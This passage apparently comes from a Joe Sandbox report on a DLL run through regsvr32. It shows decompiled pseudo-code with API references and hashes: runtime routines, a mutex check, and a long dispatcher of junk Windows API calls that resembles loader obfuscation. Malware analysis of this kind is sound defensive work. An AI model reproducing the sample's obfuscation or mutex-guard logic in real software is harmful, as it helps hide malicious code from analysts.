    				signed int _t78;
    				signed int _t79;
    				signed int _t85;
    				intOrPtr _t89;
    				intOrPtr _t90;
    				intOrPtr* _t92;
    				signed int _t93;
    				intOrPtr* _t97;
    				signed int _t103;
    				signed int _t109;
    				intOrPtr* _t112;
    				signed int _t115;
    				signed int _t118;
    				signed int _t123;
    				void* _t125;
    				void* _t126;
    				void* _t128;
    
    				_t109 = __edx;
    				while(1) {
    					_push(_a4);
    					_t54 = E6E9EC544(); // executed
    					if(_t54 != 0) {
    						return _t54;
    					}
    					_t55 = E6E9EC4BB(__eflags, _a4);
    					__eflags = _t55;
    					if(_t55 == 0) {
    						__eflags = _a4 - 0xffffffff;
    						if(_a4 != 0xffffffff) {
    							_push(_t125);
    							_t125 = _t128;
    							_t128 = _t128 - 0xc;
    							E6E9E9606( &_v20);
    							E6E9EA50C( &_v20, 0x6e9fa634);
    							asm("int3");
    						}
    						_push(_t125);
    						_t126 = _t128;
    						E6E9E3110( &_v20);
    						E6E9EA50C( &_v20, 0x6e9fa538);
    						asm("int3");
    						_push(_t126);
    						 *0x6e9fcff0 =  *0x6e9fcff0 & 0x00000000;
    						 *0x6e9fc010 =  *0x6e9fc010 | 0x00000001;
    						_t59 = IsProcessorFeaturePresent(0xa);
    						__eflags = _t59;
    						if(_t59 != 0) {
    							_v28 = _v28 & 0x00000000;
    							_push(_t89);
    							_t112 =  &_v48;
    							asm("cpuid");
    							_t90 = _t89;
    							 *_t112 = 0;
    							 *((intOrPtr*)(_t112 + 4)) = _t89;
    							 *((intOrPtr*)(_t112 + 8)) = 0;
    							 *(_t112 + 0xc) = _t109;
    							_v24 = _v48;
    							_v20 = _v36 ^ 0x49656e69;
    							_v16 = _v44 ^ 0x756e6547;
    							_push(_t90);
    							asm("cpuid");
    							_t92 =  &_v48;
    							 *_t92 = 1;
    							 *((intOrPtr*)(_t92 + 4)) = _t90;
    							__eflags = _v16 | _v40 ^ 0x6c65746e | _v20;
    							 *((intOrPtr*)(_t92 + 8)) = 0;
    							 *(_t92 + 0xc) = _t109;
    							if((_v16 | _v40 ^ 0x6c65746e | _v20) != 0) {
    								L17:
    								_t115 =  *0x6e9fcff4; // 0x2
    							} else {
    								_t85 = _v48 & 0x0fff3ff0;
    								__eflags = _t85 - 0x106c0;
    								if(_t85 == 0x106c0) {
    									L16:
    									_t118 =  *0x6e9fcff4; // 0x2
    									_t115 = _t118 | 0x00000001;
    									 *0x6e9fcff4 = _t115;
    								} else {
    									__eflags = _t85 - 0x20660;
    									if(_t85 == 0x20660) {
    										goto L16;
    									} else {
    										__eflags = _t85 - 0x20670;
    										if(_t85 == 0x20670) {
    											goto L16;
    										} else {
    											__eflags = _t85 - 0x30650;
    											if(_t85 == 0x30650) {
    												goto L16;
    											} else {
    												__eflags = _t85 - 0x30660;
    												if(_t85 == 0x30660) {
    													goto L16;
    												} else {
    													__eflags = _t85 - 0x30670;
    													if(_t85 != 0x30670) {
    														goto L17;
    													} else {
    														goto L16;
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    							_t103 = _v40;
    							_t72 = 7;
    							_v16 = _t103;
    							__eflags = _v24 - _t72;
    							if(_v24 < _t72) {
    								_t93 = _v28;
    							} else {
    								_push(_t92);
    								asm("cpuid");
    								_t97 =  &_v48;
    								 *_t97 = _t72;
    								 *((intOrPtr*)(_t97 + 4)) = _t92;
    								 *((intOrPtr*)(_t97 + 8)) = 0;
    								_t103 = _v16;
    								 *(_t97 + 0xc) = _t109;
    								_t93 = _v44;
    								__eflags = _t93 & 0x00000200;
    								if((_t93 & 0x00000200) != 0) {
    									 *0x6e9fcff4 = _t115 | 0x00000002;
    								}
    							}
    							_t73 =  *0x6e9fc010; // 0x6f
    							_t74 = _t73 | 0x00000002;
    							 *0x6e9fcff0 = 1;
    							 *0x6e9fc010 = _t74;
    							__eflags = _t103 & 0x00100000;
    							if((_t103 & 0x00100000) != 0) {
    								_t75 = _t74 | 0x00000004;
    								 *0x6e9fcff0 = 2;
    								 *0x6e9fc010 = _t75;
    								__eflags = _t103 & 0x08000000;
    								if((_t103 & 0x08000000) != 0) {
    									__eflags = _t103 & 0x10000000;
    									if((_t103 & 0x10000000) != 0) {
    										asm("xgetbv");
    										_v32 = _t75;
    										_v28 = _t109;
    										_t123 = 6;
    										__eflags = (_v32 & _t123) - _t123;
    										if((_v32 & _t123) == _t123) {
    											_t78 =  *0x6e9fc010; // 0x6f
    											_t79 = _t78 | 0x00000008;
    											 *0x6e9fcff0 = 3;
    											 *0x6e9fc010 = _t79;
    											__eflags = _t93 & 0x00000020;
    											if((_t93 & 0x00000020) != 0) {
    												 *0x6e9fcff0 = 5;
    												 *0x6e9fc010 = _t79 | 0x00000020;
    												__eflags = (_t93 & 0xd0030000) - 0xd0030000;
    												if((_t93 & 0xd0030000) == 0xd0030000) {
    													__eflags = (_v32 & 0x000000e0) - 0xe0;
    													if((_v32 & 0x000000e0) == 0xe0) {
    														 *0x6e9fc010 =  *0x6e9fc010 | 0x00000040;
    														__eflags =  *0x6e9fc010;
    														 *0x6e9fcff0 = _t123;
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    						__eflags = 0;
    						return 0;
    					} else {
    						continue;
    					}
    					break;
    				}
    			}

    APIs
    • stdext::threads::lock_error::lock_error.LIBCPMTD ref: 6E9E9644
      • Part of subcall function 6E9EA50C: RaiseException.KERNEL32(E06D7363,00000001,00000003,6E9E9657,?,?,?,6E9E9657,?,6E9FA538), ref: 6E9EA56C
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: ExceptionRaisestdext::threads::lock_error::lock_error
    • String ID:
    • API String ID: 3447279179-0
    • Opcode ID: 77c3f3b2d054159aa8d3e237ede0f444d0395926213388058ec1f73d78c12703
    • Instruction ID: f56a5adcc8137bd050ae1b8faf8f7a8ad5e317d8c707eb74a316183c9c2a9f4e
    • Opcode Fuzzy Hash: 77c3f3b2d054159aa8d3e237ede0f444d0395926213388058ec1f73d78c12703
    • Instruction Fuzzy Hash: AAF0B43080420DF68B16A6F5E8549EDB72C5E51218B504965AB2499DA0EF70E6168DC4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 37%
    			E6E9E1A60(void* __ebx, intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				signed int _v16;
    				void* __ebp;
    				intOrPtr _t16;
    				void* _t23;
    
    				_t23 = __ebx;
    				_v12 = _a4 + 0x23;
    				_t24 = _v12;
    				if(_v12 <= _a4) {
    					E6E9E6DB0();
    				}
    				_t26 = _v12;
    				_t16 = E6E9E6AF0(_v12); // executed
    				_v8 = _t16;
    				do {
    					if(_v8 == 0) {
    						do {
    							E6E9EC25F(_t23, _t24, _t26, __eflags);
    							__eflags = 0;
    						} while (0 != 0);
    					} else {
    					}
    					_t24 = 0;
    				} while (0 != 0);
    				_v16 = _v8 + 0x00000023 & 0xffffffe0;
    				 *((intOrPtr*)(_v16 + 0xfffffffffffffffc)) = _v8;
    				return _v16;
    			}

    APIs
    • Concurrency::cancel_current_task.LIBCPMTD ref: 6E9E1A77
      • Part of subcall function 6E9E6DB0: stdext::threads::lock_error::lock_error.LIBCPMTD ref: 6E9E6DB9
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: Concurrency::cancel_current_taskstdext::threads::lock_error::lock_error
    • String ID:
    • API String ID: 2103942186-0
    • Opcode ID: b76c894fc18651f0dd9a731209d8a28e113a96b5c028739d6e19fc56e693ba99
    • Instruction ID: 0c1a61c3e62911bb583e1787cafc347c45386cc53d6d7f2c641f6ada25f571fe
    • Opcode Fuzzy Hash: b76c894fc18651f0dd9a731209d8a28e113a96b5c028739d6e19fc56e693ba99
    • Instruction Fuzzy Hash: 1EF0AF70D0010CBBCB01DFE9D580AADF7B8AF85344F1081AADA01ABB48D730EA80CF85
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E9EE649(long _a4) {
    				void* _t4;
    				long _t8;
    
    				_t8 = _a4;
    				if(_t8 > 0xffffffe0) {
    					L7:
    					 *((intOrPtr*)(E6E9ED46D(__eflags))) = 0xc;
    					__eflags = 0;
    					return 0;
    				}
    				if(_t8 == 0) {
    					_t8 = _t8 + 1;
    				}
    				while(1) {
    					_t4 = RtlAllocateHeap( *0x6e9fd9d8, 0, _t8); // executed
    					if(_t4 != 0) {
    						break;
    					}
    					__eflags = E6E9F0684();
    					if(__eflags == 0) {
    						goto L7;
    					}
    					__eflags = E6E9EC4BB(__eflags, _t8);
    					if(__eflags == 0) {
    						goto L7;
    					}
    				}
    				return _t4;
    			}

    APIs
    • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,6E9F0272,?,00000000,?,6E9ED4C9,?,00000004,?,?,?,?,6E9ECFC7), ref: 6E9EE67B
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: a9a6810bffec7b56bcb7ae2705573d172ac353f767a3a28f89010ac6dceb7c40
    • Instruction ID: 234295da07b709b72a820f3ac5e7ae02516120a83249c55bda4c7447fe6781e3
    • Opcode Fuzzy Hash: a9a6810bffec7b56bcb7ae2705573d172ac353f767a3a28f89010ac6dceb7c40
    • Instruction Fuzzy Hash: 38E02B312456156BEB1316F65C1479A3A4C9FD2FA4F0206119F64DAFC0DB61D8008DE9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E6E9E69A0(CHAR* _a4) {
    				intOrPtr _v8;
    				void* _v12;
    				intOrPtr _v16;
    
    				_v8 = E6E9E2310(0, 0);
    				_v12 = CreateMutexA(0, 1, _a4);
    				if( *((intOrPtr*)(E6E9E23D0(0, 0)))() != 0xb7) {
    					return 1;
    				}
    				_v16 = E6E9E2700(0, 0);
    				_v16(_v12);
    				return 0;
    			}

    APIs
    • CreateMutexA.KERNEL32(00000000,00000001,6E9E8BA2,00000000,00000000,?,6E9E8BA2,?), ref: 6E9E69BA
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: CreateMutex
    • String ID:
    • API String ID: 1964310414-0
    • Opcode ID: 1bf1de3a6295c32259e3bbdbdba4fd3025900568e850f2af5441e8a4a44c5196
    • Instruction ID: a41d91431fd2dd1cf0215c17192de813dfd996d5472e8a7de5b8249d0246eb6c
    • Opcode Fuzzy Hash: 1bf1de3a6295c32259e3bbdbdba4fd3025900568e850f2af5441e8a4a44c5196
    • Instruction Fuzzy Hash: 8AF01C74A94308BBE750ABF48C06B9DBAA89F54B01F104854FB09EB5C1D6B19A408F62
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E9E19F0(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
    				WCHAR* _v8;
    				WCHAR* _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    
    				_v20 = __ecx;
    				_v16 = E6E9E2190(__eflags);
    				_v8 =  *((intOrPtr*)(E6E9E12B0(_a8)));
    				_v12 =  *((intOrPtr*)(E6E9E12B0(_a4)));
    				return StrCmpIW(_v12, _v8);
    			}

    APIs
    • StrCmpIW.SHLWAPI(?,00000000,?,6E9E5D13,?,6E9E5D13,?,00000000,6E9E265E,E463DA3C,?,6E9E5DAA), ref: 6E9E1A25
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 0f8907e583578c55cdefc4c0f39f8731c7db44550c7d3d73018c5631cd47dc09
    • Instruction ID: ae4d4a1caabc2299a6006e19aaaf76a970159217e7d59239d8a9e68517a6b8ba
    • Opcode Fuzzy Hash: 0f8907e583578c55cdefc4c0f39f8731c7db44550c7d3d73018c5631cd47dc09
    • Instruction Fuzzy Hash: C5E0C079D04208AFCB05DFE4C84089EB7B8EF99300B108999E6159B300DB34DA409FD4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E9EC2B0(intOrPtr _a4) {
    				intOrPtr _v8;
    				void* _t5;
    
    				_v8 = 0;
    				_t5 = E6E9EDC0E(_a4); // executed
    				return _t5;
    			}

    APIs
    • _free.LIBCMT ref: 6E9EC2C3
      • Part of subcall function 6E9EDC0E: RtlFreeHeap.NTDLL(00000000,00000000,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?), ref: 6E9EDC24
      • Part of subcall function 6E9EDC0E: GetLastError.KERNEL32(?,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?,?), ref: 6E9EDC36
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: ErrorFreeHeapLast_free
    • String ID:
    • API String ID: 1353095263-0
    • Opcode ID: f23d6dbf9a85b4c9ad5e1337a3be32e45efe08f72eb37184d3eeb89a74728ec8
    • Instruction ID: 631096a15dff460f08b3015b079304aafd368ea9b19ef000ad0d8585e7950d66
    • Opcode Fuzzy Hash: f23d6dbf9a85b4c9ad5e1337a3be32e45efe08f72eb37184d3eeb89a74728ec8
    • Instruction Fuzzy Hash: C6C04C71500208FBDB059B95DA06A8E7BADDFC02A8F204054E51557650DBB1EE449A90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E9E6FF0(long _a4) {
    				void* _t4;
    
    				_t4 = HeapAlloc(E6E9E83B0(), 0, _a4); // executed
    				return _t4;
    			}

    APIs
    • HeapAlloc.KERNEL32(00000000,00000000,?,?,6E9E7621,?,?), ref: 6E9E6FFF
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: AllocHeap
    • String ID:
    • API String ID: 4292702814-0
    • Opcode ID: 8d2fc157657893beec9b0eaba60ce9a533408f5e6907ba399882b42dc233071f
    • Instruction ID: 46b022decdad034513aa93f94d2437f26d3cd6e38fc56865089b79c2200f4bfe
    • Opcode Fuzzy Hash: 8d2fc157657893beec9b0eaba60ce9a533408f5e6907ba399882b42dc233071f
    • Instruction Fuzzy Hash: 0BC09BF114470867D61056E4B809F96775C9F54601F044411BF0986540C671FC1045B5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 61%
    			E6E9E8630(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
    				intOrPtr _v8;
    				long _v12;
    				int _v16;
    				int _v20;
    				long _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				int _v44;
    				struct HMENU__* _v48;
    				intOrPtr _v52;
    				int _v56;
    				WCHAR* _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				int _v72;
    				intOrPtr _v76;
    				long _v80;
    				long _v84;
    				long _v88;
    				long _v92;
    				intOrPtr _v96;
    				int _v100;
    				intOrPtr _v104;
    				intOrPtr _v108;
    				intOrPtr _v112;
    				intOrPtr _v116;
    				struct _SID_IDENTIFIER_AUTHORITY* _v120;
    				int _v124;
    				int _v128;
    				int _v132;
    				intOrPtr _v136;
    				long _v140;
    				long _v144;
    				void* _v148;
    				char _v164;
    				void* _t116;
    				intOrPtr _t118;
    				void* _t180;
    
    				if((E6E9E5D90(__eflags) & 0x000000ff) == 0) {
    					L87:
    					__eflags = 0;
    					return 0;
    				}
    				_t184 = _a4;
    				if(_a4 == 0) {
    					goto L87;
    				}
    				_t116 = E6E9E5910(_t184);
    				_t185 = _t116;
    				if(_t116 == 0) {
    					return 1;
    				}
    				_t118 = E6E9E7700(_t185);
    				if(_t118 == 0) {
    					return 1;
    				}
    				if(_a4 == 2) {
    					_v12 = FormatMessageA(0, 0, 0, 0, 0, 0, 0);
    					return _a4;
    				}
    				__eflags = _a4 - 3;
    				if(_a4 == 3) {
    					_v16 = TextOutW(0, 0, 0, 0, 0);
    					return _a4;
    				}
    				__eflags = _a4 - 4;
    				if(_a4 != 4) {
    					__eflags = _a4 - 5;
    					if(_a4 != 5) {
    						__eflags = _a4 - 6;
    						if(_a4 != 6) {
    							__eflags = _a4 - 7;
    							if(_a4 != 7) {
    								__eflags = _a4 - 8;
    								if(_a4 != 8) {
    									__eflags = _a4 - 9;
    									if(_a4 != 9) {
    										__eflags = _a4 - 0xa;
    										if(_a4 != 0xa) {
    											__eflags = _a4 - 0xb;
    											if(_a4 != 0xb) {
    												__eflags = _a4 - 0xc;
    												if(_a4 != 0xc) {
    													__eflags = _a4 - 0xd;
    													if(_a4 != 0xd) {
    														__eflags = _a4 - 0xe;
    														if(_a4 != 0xe) {
    															__eflags = _a4 - 0xf;
    															if(_a4 != 0xf) {
    																__eflags = _a4 - 0x10;
    																if(_a4 != 0x10) {
    																	__eflags = _a4 - 0x11;
    																	if(_a4 != 0x11) {
    																		__eflags = _a4 - 0x12;
    																		if(_a4 != 0x12) {
    																			__eflags = _a4 - 0x13;
    																			if(_a4 != 0x13) {
    																				__eflags = _a4 - 0x14;
    																				if(_a4 != 0x14) {
    																					__eflags = _a4 - 0x15;
    																					if(_a4 != 0x15) {
    																						__eflags = _a4 - 0x16;
    																						if(_a4 != 0x16) {
    																							__eflags = _a4 - 0x17;
    																							if(_a4 != 0x17) {
    																								__eflags = _a4 - 0x18;
    																								if(_a4 != 0x18) {
    																									__eflags = _a4 - 0x19;
    																									if(_a4 != 0x19) {
    																										__eflags = _a4 - 0x1a;
    																										if(_a4 != 0x1a) {
    																											__eflags = _a4 - 0x1b;
    																											if(_a4 != 0x1b) {
    																												__eflags = _a4 - 1;
    																												if(_a4 == 1) {
    																													__eflags = _a8;
    																													if(_a8 != 0) {
    																														__eflags = E6E9E7670();
    																														if(__eflags == 0) {
    																															_t118 = E6E9E6960(_t180);
    																															__eflags = _t118;
    																															if(_t118 != 0) {
    																																_t118 = E6E9E7770();
    																																_v8 = _t118;
    																																__eflags = _v8 - 1;
    																																if(_v8 == 1) {
    																																	__eflags = E6E9E71E0();
    																																	if(__eflags == 0) {
    																																		_t118 = E6E9E6390(__eflags);
    																																	} else {
    																																		_t118 = E6E9E6390(__eflags);
    																																	}
    																																}
    																															}
    																														} else {
    																															_t118 = E6E9E6390(__eflags);
    																														}
    																													}
    																												}
    																												__eflags = _a4 - 0x1c;
    																												if(_a4 != 0x1c) {
    																													__eflags = _a4 - 0x1d;
    																													if(_a4 != 0x1d) {
    																														__eflags = _a4 - 0x1e;
    																														if(_a4 != 0x1e) {
    																															__eflags = _a4 - 0x1f;
    																															if(_a4 != 0x1f) {
    																																__eflags = _a4 - 0x20;
    																																if(_a4 != 0x20) {
    																																	__eflags = _a4 - 0x21;
    																																	if(_a4 != 0x21) {
    																																		__eflags = _a4 - 0x22;
    																																		if(_a4 != 0x22) {
    																																			__eflags = _a4 - 0x23;
    																																			if(_a4 != 0x23) {
    																																				__eflags = _a4 - 0x24;
    																																				if(_a4 != 0x24) {
    																																					goto L87;
    																																				}
    																																				_v148 = DuplicateIcon(0, 0);
    																																				return _a4;
    																																			}
    																																			_v144 = SHStrDupA(0, 0);
    																																			return _a4;
    																																		}
    																																		_v140 = SHStrDupW(0, 0);
    																																		return _a4;
    																																	}
    																																	__imp__CreateMutexExW(0, 0, 0, 0);
    																																	_v136 = _t118;
    																																	return _a4;
    																																}
    																																_v132 = IsValidSid(0);
    																																return _a4;
    																															}
    																															_v128 = IsValidAcl(0);
    																															return _a4;
    																														}
    																														_v124 = DisableThreadLibraryCalls(0);
    																														return _a4;
    																													}
    																													_v120 = GetSidIdentifierAuthority(0);
    																													return _a4;
    																												}
    																												__imp__CoTaskMemAlloc(0);
    																												_v116 = _t118;
    																												return _a4;
    																											}
    																											__imp__CoCancelCall(0, 0);
    																											_v112 = _t118;
    																											return _a4;
    																										}
    																										__imp__CveEventWrite(0, 0);
    																										_v108 = _t118;
    																										return _a4;
    																									}
    																									__imp__RpcExceptionFilter(0);
    																									_v104 = _t118;
    																									return _a4;
    																								}
    																								_v100 = RevertToSelf();
    																								return _a4;
    																							}
    																							__imp__IsTokenRestricted(0);
    																							_v96 = _t118;
    																							return _a4;
    																						}
    																						_v92 = GetProcessId(0);
    																						return _a4;
    																					}
    																					_v88 = GetPriorityClass(0);
    																					return _a4;
    																				}
    																				_v84 = GetVersion();
    																				return _a4;
    																			}
    																			_v80 = GetMessageTime();
    																			return _a4;
    																		}
    																		__imp__UuidCreate(0);
    																		_v76 = _t118;
    																		return _a4;
    																	}
    																	_v72 = GetConsoleCP();
    																	return _a4;
    																}
    																__imp__DceErrorInqTextA(0, 0);
    																_v68 = _t118;
    																return _a4;
    															}
    															__imp__SHGetThreadRef(0);
    															_v64 = _t118;
    															return _a4;
    														}
    														_v60 = CharNextW(0);
    														return _a4;
    													}
    													_v56 = SetFileAttributesW(0, 0);
    													return _a4;
    												}
    												__imp__GetProductInfo(0, 0, 0, 0, 0);
    												_v52 = _t118;
    												return _a4;
    											}
    											_v48 = CreatePopupMenu();
    											return _a4;
    										}
    										_v44 = FlattenPath(0);
    										return _a4;
    									}
    									__imp__CoGetCallerTID(0);
    									_v40 = _t118;
    									return _a4;
    								}
    								__imp__CoCreateInstance( &_v164, 0, 0,  &_v164, 0);
    								_v36 = _t118;
    								return _a4;
    							}
    							__imp__OleInitialize(0);
    							_v32 = _t118;
    							return _a4;
    						}
    						__imp__CoInitialize(0);
    						_v28 = _t118;
    						return _a4;
    					}
    					_v24 = FormatMessageW(0, 0, 0, 0, 0, 0, 0);
    					return _a4;
    				} else {
    					_v20 = TextOutA(0, 0, 0, 0, 0);
    					return _a4;
    				}
    			}












































    APIs
      • Part of subcall function 6E9E5D90: LoadLibraryA.KERNEL32(?,KERNEL32.dll,00000000), ref: 6E9E5EBF
    • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E9E8681
    • TextOutW.GDI32(00000000,00000000,00000000,00000000,00000000), ref: 6E9E86A2
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: FormatLibraryLoadMessageText
    • String ID: $
    • API String ID: 775064453-3993045852
    • Opcode ID: bca75b851b2be10c8dbc2a778128c5f0c890b50445de05bc16343553a978b486
    • Instruction ID: 59ff1840f326400d3893ccaa3ab062e28d5638839030e706fb7ed5452b6354da
    • Opcode Fuzzy Hash: bca75b851b2be10c8dbc2a778128c5f0c890b50445de05bc16343553a978b486
    • Instruction Fuzzy Hash: E3C1D070A58208FFDF69DFE9D44978C3BB4AF06341F588415FA0AAAA44D770D980CF92
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E6E9E9839(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
    				char _v0;
    				struct _EXCEPTION_POINTERS _v12;
    				intOrPtr _v80;
    				intOrPtr _v88;
    				char _v92;
    				intOrPtr _v608;
    				intOrPtr _v612;
    				void* _v616;
    				intOrPtr _v620;
    				char _v624;
    				intOrPtr _v628;
    				intOrPtr _v632;
    				intOrPtr _v636;
    				intOrPtr _v640;
    				intOrPtr _v644;
    				intOrPtr _v648;
    				intOrPtr _v652;
    				intOrPtr _v656;
    				intOrPtr _v660;
    				intOrPtr _v664;
    				intOrPtr _v668;
    				char _v808;
    				char* _t39;
    				long _t49;
    				intOrPtr _t51;
    				void* _t54;
    				intOrPtr _t55;
    				intOrPtr _t57;
    				intOrPtr _t58;
    				intOrPtr _t59;
    				intOrPtr* _t60;
    
    				_t59 = __esi;
    				_t58 = __edi;
    				_t57 = __edx;
    				if(IsProcessorFeaturePresent(0x17) != 0) {
    					_t55 = _a4;
    					asm("int 0x29");
    				}
    				E6E9E9954(_t34);
    				 *_t60 = 0x2cc;
    				_v632 = E6E9EA330(_t58,  &_v808, 0, 3);
    				_v636 = _t55;
    				_v640 = _t57;
    				_v644 = _t51;
    				_v648 = _t59;
    				_v652 = _t58;
    				_v608 = ss;
    				_v620 = cs;
    				_v656 = ds;
    				_v660 = es;
    				_v664 = fs;
    				_v668 = gs;
    				asm("pushfd");
    				_pop( *_t15);
    				_v624 = _v0;
    				_t39 =  &_v0;
    				_v612 = _t39;
    				_v808 = 0x10001;
    				_v628 =  *((intOrPtr*)(_t39 - 4));
    				E6E9EA330(_t58,  &_v92, 0, 0x50);
    				_v92 = 0x40000015;
    				_v88 = 1;
    				_v80 = _v0;
    				_t28 = IsDebuggerPresent() - 1; // -1
    				_v12.ExceptionRecord =  &_v92;
    				asm("sbb bl, bl");
    				_v12.ContextRecord =  &_v808;
    				_t54 =  ~_t28 + 1;
    				SetUnhandledExceptionFilter(0);
    				_t49 = UnhandledExceptionFilter( &_v12);
    				if(_t49 == 0 && _t54 == 0) {
    					_push(3);
    					return E6E9E9954(_t49);
    				}
    				return _t49;
    			}



































    APIs
    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6E9E9845
    • IsDebuggerPresent.KERNEL32 ref: 6E9E9911
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E9E9931
